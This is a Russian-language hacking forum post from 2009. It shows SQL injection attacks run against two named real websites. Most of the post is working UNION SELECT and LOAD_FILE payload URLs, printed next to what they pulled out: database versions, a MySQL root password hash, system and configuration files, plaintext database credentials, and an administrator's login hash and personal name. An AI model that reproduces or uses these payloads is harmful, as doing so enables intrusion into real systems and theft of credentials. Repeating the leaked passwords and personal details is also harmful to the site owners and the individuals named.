Показать сообщение отдельно

  #8  
Старый 13.03.2009, 23:34
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

2IP Показал 78 сайтов

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--

Database Version: 4.1.22-standard-log
Database name: brit
User name: root@localhost

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+union+select+1,2,3,concat_ws(0x3a,user,passw ord),5,6+from+mysql.user+limit+0,1--

root : 1e775af3568b3992

Читаем etc/passwd

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F6574632F706173737764),0x3a),5,6--
Читаем /etc/httpd/conf/httpd.conf

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F6574632F68747470642F636F6E662F68747470642E636F6E6 6),0x3a),5,6--

Читаем конфиг базы /var/www/html/bcm/settings.php

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F7661722F7777772F68746D6C2F62636D2F73657474696E677 32E706870),0x3a),5,6--

//database settings, variable names should explain themselves
$mysql_server = 'localhost'; //as in localhost
$mysql_username = ' root ';
$mysql_password = ' save406 ';
$mysql_database = ' brit ';
//

И впрёёёёддд.......



Цитата:
https://thedfi.hs-cluster-1.net/event.php?id=8897654322+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47--

Database Version: 5.0.67-log
Database name: thedfi_data
User name: thedfi_user@65.99.201.17

Наверное это Админчег

Цитата:
https://thedfi.hs-cluster-1.net/event.php?id=8897654322+UNION+SELECT+1,CONCAT(0x3a ,(SELECT+CONCAT(username,0x3a,upassword,0x3a,email address,0x3a,firstname,0x3a,lastname,0x3a,security level)+FROM+thedfi_data.passwords+LIMIT+1,1),0x3a) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47--

: shott : 38108a1210ec0f39 : : Shirley : Hott : 1
 
Ответить с цитированием